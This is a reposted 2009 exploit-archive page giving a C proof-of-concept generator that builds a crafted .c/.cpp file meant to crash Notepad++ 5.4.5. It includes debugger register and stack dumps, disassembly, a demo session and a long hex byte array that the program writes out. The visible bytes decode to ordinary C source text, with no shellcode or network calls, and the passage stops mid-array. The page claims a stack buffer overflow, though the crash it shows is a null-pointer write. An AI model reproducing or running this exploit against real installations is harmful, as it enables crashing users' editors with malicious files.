首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow PoC (0day)
来源:vfocus.net 作者:fl0_fl0w 发布时间:2009-09-17  

/*
**************************************************************
 (0day)Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC*
  by fl0 fl0w                                                *
************************************************************** 
*/

/*****************************************************************************************************
LATEST FIXES                                                                                         *
Notepad++ v5.4.5 fixed bugs (from v5.4.4) :                                                          *
1.  Fix plugins shortcuts not working bug.                                                           *
2.  Fix the tooltip on toolbar display bug for the plugins icons.                                    *
3.  Fix a crash that was occurring when searching in files from a deep path.                         *
4.  Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.*
5.  Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml).                         * 
6.  Add SQL folding capacity.                                                                        *  
******************************************************************************************************
*/

/***************************************************************************
This is the latest version of notepad++.                                   *
As you can see no buffer overflow bug is mentioned to exist or to be fixed.*
****************************************************************************
*/

/***********************************************************
DEBUGGING INFORMATION                                      *
CPU REGISTERS                                              *
EAX 00000000                                               *
ECX 003B74C4                                               *
EDX 00000000                                               *
EBX 0999A999                                               *
ESP 000E0764                                               *
EBP 000E0834                                               *
ESI 00B3D760                                               *
EDI 003B74B0                                               *
EIP 1000A258 SciLexer.1000A258                             *
                                                           *
Function  SciLexer() is causing this bug.                  *
Let's look at the assembly instructions:                   *
                                                           *
ASSEMBLY INSTRUCTIONS                                      *
1000A258   8910             MOV DWORD PTR DS:[EAX],EDX     *
1000A25A   8B45 F8          MOV EAX,DWORD PTR SS:[EBP-8]   *
1000A25D   8B80 60090000    MOV EAX,DWORD PTR DS:[EAX+960] *
1000A263   8B80 B0010000    MOV EAX,DWORD PTR DS:[EAX+1B0] *
1000A269   0FAF81 24060000  IMUL EAX,DWORD PTR DS:[ECX+624]*
1000A270   2055 FF          AND BYTE PTR SS:[EBP-1],DL     *
1000A273   8945 C0          MOV DWORD PTR SS:[EBP-40],EAX  *
1000A276   8B41 10          MOV EAX,DWORD PTR DS:[ECX+10]  *
1000A279   05 6C0B0000      ADD EAX,0B6C                   *
1000A27E   8945 CC          MOV DWORD PTR SS:[EBP-34],EAX  *
1000A281   33C0             XOR EAX,EAX                    *
1000A283   6A 1F            PUSH 1F                        *
1000A285   59               POP ECX                        *
                                                           *
EDX=00000000                                               *
DS:[00000000]=???                                          *
************************************************************
*/

/*************************************************************
STACK                                                        *
000BFEB4   004956A0  notepad+.004956A0                       *
000BFEB8   F74B257B                                          *
000BFEBC   FFFFFFFE                                          *
000BFEC0   58585858                                          *
000BFEC4   58585858                                          *
000BFEC8   58585858q                                         *
000BFECC   58585858                                          *
000BFED0   58585858                                          *
000BFED4   58585858                                          *
000BFED8   58585858                                          *
000BFEDC   58585858                                          *
000BFEE0   58585858                                          *
000BFEE4   58585858                                          *
000BFEE8   58585858                                          *
000BFEEC   58585858                                          *                                         
000BFEF4   58585858                                          *
000BFEF8   58585858                                          *
000BFEFC   58585858                                          *
000BFF00   58585858                                          *
000BFF04   58585858                                          *                                         
000BFF0C   58585858                                          *
000BFF10   58585858                                          *
…..................................                          *
Tested succesfull on Microsoft Windows XP Service Pack 3.    *      
To test the exploit(notepad++.c) you need to compile it      *
with cygwin console or linux environment.                    *
If you want to test the executable(test.exe)you need to      *
copy the cygwin1.dll in the same folder as the executable.   *
Notepad++ 5.4.5 crashes in a STACK BUFFER OVERFLOW when a    *
specialy crafted .C/CPP file is opened.You can right click   *
the file and select ->edit with notepad++ or just click open.*
Compiled with cygwin console                                 *
For more debugging info (screenshots)                        *
Download the files from                                      *
http://rapidshare.com/files/280798297/notepad___POC.zip.html *
http://www.2shared.com/file/7836030/4bfaf50b/notepad_POC.html*
http://www.filehost.ro/557267/notepad_POC_zip/               * 
http://www.turboupload.com/1n8248ys8a15/notepad++_POC.zip.html 
http://www.gigasize.com/get.php?d=c877pxt4pxb                *  
**************************************************************/

/*****************************************************************************************************************************
DEMO                                                                                                                         *  
I'm in the cygwin console                                                                                                    *
$gcc notepad++.c -o notepad                                                                                                  *
                                                                                                                             *
Now I want to run the .exe from                                                                                              *
CMD console so I copy the cygwin1.dll                                                                                        *
in my folder and run it.                                                                                                     *
                                                                                                                             *
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir                                                                   *
 Volume in drive C is System                                                                                                 *
 Volume Serial Number is A06E-304B                                                                                           *
                                                                                                                             *
 Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC                                                         *
                                                                                                                             *
2009/09/16  01:13 PM    <DIR>          .                                                                                     *
2009/09/16  01:13 PM    <DIR>          ..                                                                                    *
2008/06/12  08:35 PM         1,872,884 cygwin1.dll                                                                           *
2009/09/14  03:09 PM       100,004,279 fffile.cpp                                                                            *
2009/09/16  01:13 PM            18,042 note.exe                                                                              *
2009/09/14  01:05 AM            12,317 NOTEPAD++ PLEASE READ.odt                                                             *
2009/09/16  01:11 PM            36,923 notepad++.c                                                                           *
2009/09/11  01:40 PM           192,747 screen1.JPG                                                                           *
2009/09/11  01:44 PM           224,376 screen2.JPG                                                                           *
2009/09/12  08:37 PM           443,304 screen3.JPG                                                                           *
               8 File(s)    102,804,872 bytes                                                                                *
               2 Dir(s)   4,864,954,368 bytes free                                                                           *
                                                                                                                             *
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe                                                              *
  *************************************************                                                                          *
Notepad++ 5.4.5 Stack Buffer Overflow                                                                                        *
Usage is:note [option1] filename                                                                                             *
CREDITS:fl0 fl0w                                                                                                             *
This POC is PRIVATE                                                                                                          *
*************************************************                                                                            *
Example:                                                                                                                     *
                                                                                                                             *
        -f       FILE.c/cpp                                                                                                  *
                                                                                                                             *
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe -f test.cpp                                                  *
FILE DONE !                                                                                                                  *
path/location of the crafted file is: /cygdrive/c/Documents and Settings/Stefan/                                             *
Desktop/notepad++ POC/                                                                                                       *
                                                                                                                             *
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir                                                                   *
 Volume in drive C is System                                                                                                 *
 Volume Serial Number is A06E-304B                                                                                           *
                                                                                                                             *
 Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC                                                         *
                                                                                                                             *
2009/09/16  01:18 PM    <DIR>          .                                                                                     *
2009/09/16  01:18 PM    <DIR>          ..                                                                                    *
2008/06/12  08:35 PM         1,872,884 cygwin1.dll                                                                           *
2009/09/14  03:09 PM       100,004,279 fffile.cpp                                                                            *
2009/09/16  01:13 PM            18,042 note.exe                                                                              *
2009/09/14  01:05 AM            12,317 NOTEPAD++ PLEASE READ.odt                                                             *
2009/09/16  01:11 PM            36,923 notepad++.c                                                                           *
2009/09/11  01:40 PM           192,747 screen1.JPG                                                                           *
2009/09/11  01:44 PM           224,376 screen2.JPG                                                                           *
2009/09/12  08:37 PM           443,304 screen3.JPG                                                                           *
2009/09/16  01:18 PM       100,004,279 test.cpp     <--------------------------here you go now open it with notepad++ 5.4.5  *
               9 File(s)    202,809,151 bytes                                                                                *
               2 Dir(s)   4,746,797,056 bytes free                                                                           *
******************************************************************************************************************************              
*/
   #include "stdio.h"
   #include "string.h"
   #include "windows.h"
   #include "getopt.h"
   #include "stdint.h"
   #include <fcntl.h>
   #include <io.h>
   #define R 0x10
   #define RR 0x1F
   #define SS 0x80
 
   void CLS(int num_lines)
  {
  int n;
  for(n = 0; n < num_lines; n++)
  puts("");
  }

 char checksum(char data[10000], char len)
    {
    uint32_t sum1 = 0xffff, sum2 = 0xffff;
    while (len) {
    unsigned tlen = len > 360 ? 360 : len;
    len -= tlen;
    do {
    sum1 += *data++;
    sum2 += sum1;
    } while (--tlen);
    sum1 = (sum1 & 0xffff) + (sum1 >> 16);
    sum2 = (sum2 & 0xffff) + (sum2 >> 16);
    }
    sum1 = (sum1 & 0xffff) + (sum1 >> 16);
    sum2 = (sum2 & 0xffff) + (sum2 >> 16);
    return sum2 << 16 | sum1;
    }
  
    void Buildfile(char *fname)
    {
     char V[] =
   { 
   0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x73, 0x74,
    0x64, 0x69, 0x6F, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63,
    0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2E, 0x68, 0x3E,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C,
    0x73, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23,
    0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x67, 0x65, 0x74, 0x6F, 0x70, 0x74, 0x2E,
    0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65,
    0x20, 0x3C, 0x73, 0x74, 0x64, 0x69, 0x6E, 0x74, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20,
    0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x20,
    0x53, 0x74, 0x61, 0x72, 0x74, 0x20, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69,
    0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75,
    0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x74, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
    0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6D, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
    0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6C, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x48, 0x54, 0x4D, 0x4C, 0x3B, 0x0D, 0x0A,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74,
    0x72, 0x75, 0x63, 0x74, 0x20, 0x4D, 0x69, 0x64, 0x64, 0x6C, 0x65, 0x20, 0x7B, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x3B, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x65, 0x3B, 0x20,
    0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74,
    0x20, 0x73, 0x61, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75,
    0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x64, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x09, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x09, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x7D, 0x48, 0x45, 0x41, 0x44, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74,
    0x72, 0x75, 0x63, 0x74, 0x20, 0x45, 0x6E, 0x64, 0x20, 0x20, 0x20, 0x20, 0x7B, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x62, 0x3B, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6F, 0x3B, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x44, 0x3B,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x79,
    0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x42, 0x4F,
    0x44, 0x59, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65,
    0x20, 0x42, 0x55, 0x46, 0x46, 0x45, 0x52, 0x53, 0x49, 0x5A, 0x45, 0x20, 0x20, 0x30, 0x78, 0x31,
    0x41, 0x30, 0x41, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65,
    0x20, 0x46, 0x49, 0x4C, 0x45, 0x53, 0x49, 0x5A, 0x45, 0x20, 0x20, 0x20, 0x20, 0x32, 0x39, 0x41,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65, 0x20, 0x53, 0x52,
    0x43, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x22, 0x3C, 0x69, 0x6D, 0x67, 0x20,
    0x73, 0x72, 0x63, 0x3D, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x76, 0x6F, 0x69, 0x64, 0x20,
    0x46, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x28, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x66, 0x6E, 0x61,
    0x6D, 0x65, 0x29, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x7B, 0x20, 0x48, 0x54, 0x4D, 0x4C, 0x20,
    0x2A, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x48,
    0x45, 0x41, 0x44, 0x20, 0x2A, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x42, 0x4F, 0x44, 0x59, 0x20, 0x2A, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x3B, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x6D, 0x65, 0x6D,
    0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F,
    0x2F, 0x22, 0x5C, 0x78, 0x34, 0x38, 0x5C, 0x78, 0x35, 0x34, 0x5C, 0x78, 0x34, 0x44, 0x5C, 0x78,
    0x34, 0x43, 0x22, 0x20, 0x20, 0x2D, 0x68, 0x74, 0x6D, 0x6C, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x20, 0x3D, 0x20, 0x28, 0x48, 0x54, 0x4D, 0x4C, 0x2A,
    0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x48,
    0x54, 0x4D, 0x4C, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65,
    0x5F, 0x61, 0x64, 0x20, 0x3D, 0x20, 0x28, 0x48, 0x45, 0x41, 0x44, 0x2A, 0x29, 0x6D, 0x61, 0x6C,
    0x6C, 0x6F, 0x63, 0x28, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x48, 0x45, 0x41, 0x44, 0x29,
    0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x20,
    0x3D, 0x20, 0x28, 0x42, 0x4F, 0x44, 0x59, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28,
    0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x42, 0x4F, 0x44, 0x59, 0x29, 0x29, 0x3B, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x20,
    0x3D, 0x20, 0x28, 0x63, 0x68, 0x61, 0x72, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28,
    0x42, 0x55, 0x46, 0x46, 0x45, 0x52, 0x53, 0x49, 0x5A, 0x45, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x20, 0x3D, 0x3D, 0x20,
    0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x20, 0x3D, 0x3D,
    0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x20, 0x3D,
    0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66,
    0x66, 0x65, 0x72, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x29, 0x20, 0x7B, 0x20, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x65, 0x78, 0x69, 0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x7D, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D,
    0x3E, 0x73, 0x68, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x38, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x74, 0x20, 0x3D, 0x20, 0x30,
    0x78, 0x35, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D,
    0x6C, 0x2D, 0x3E, 0x73, 0x6D, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x44, 0x3B, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x6C, 0x20, 0x3D,
    0x20, 0x30, 0x78, 0x34, 0x43, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F,
    0x73, 0x65, 0x63, 0x6F, 0x6E, 0x64, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x75, 0x72, 0x65,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x48, 0x45, 0x41, 0x44, 0x20, 0x22,
    0x5C, 0x78, 0x34, 0x38, 0x5C, 0x78, 0x34, 0x35, 0x5C, 0x78, 0x34, 0x31, 0x5C, 0x78, 0x34, 0x34,
    0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E,
    0x73, 0x68, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x38, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x65, 0x20, 0x3D, 0x20, 0x30, 0x78,
    0x34, 0x35, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64,
    0x2D, 0x3E, 0x73, 0x61, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x64, 0x20, 0x3D, 0x20,
    0x30, 0x78, 0x34, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x74,
    0x68, 0x69, 0x65, 0x72, 0x64, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x75, 0x72, 0x65, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x22, 0x5C, 0x78, 0x34, 0x32, 0x5C, 0x78,
    0x34, 0x46, 0x5C, 0x78, 0x34, 0x34, 0x5C, 0x78, 0x35, 0x39, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x62, 0x20, 0x3D, 0x20, 0x30,
    0x78, 0x34, 0x32, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64,
    0x79, 0x2D, 0x3E, 0x73, 0x6F, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x46, 0x3B, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x44, 0x20, 0x3D,
    0x20, 0x30, 0x78, 0x34, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F,
    0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x79, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x35, 0x39, 0x3B, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x49, 0x4C, 0x45, 0x20, 0x2A, 0x66, 0x3B, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x20, 0x3D, 0x20, 0x66, 0x6F, 0x70, 0x65, 0x6E,
    0x28, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x2C, 0x20, 0x22, 0x77, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x28, 0x20, 0x66, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55,
    0x4C, 0x4C, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x65, 0x78, 0x69,
    0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x6E, 0x74, 0x33, 0x32, 0x5F, 0x74, 0x20, 0x6F,
    0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x3D, 0x20, 0x30, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,
    0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B,
    0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,
    0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72,
    0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2C, 0x20,
    0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x29, 0x3B, 0x0D,
    0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D,
    0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x3B, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63,
    0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66,
    0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20,
    0x31, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D,
    0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B,
    0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B,
    0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B,
    0x3D, 0x20, 0x31, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,
    0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68,
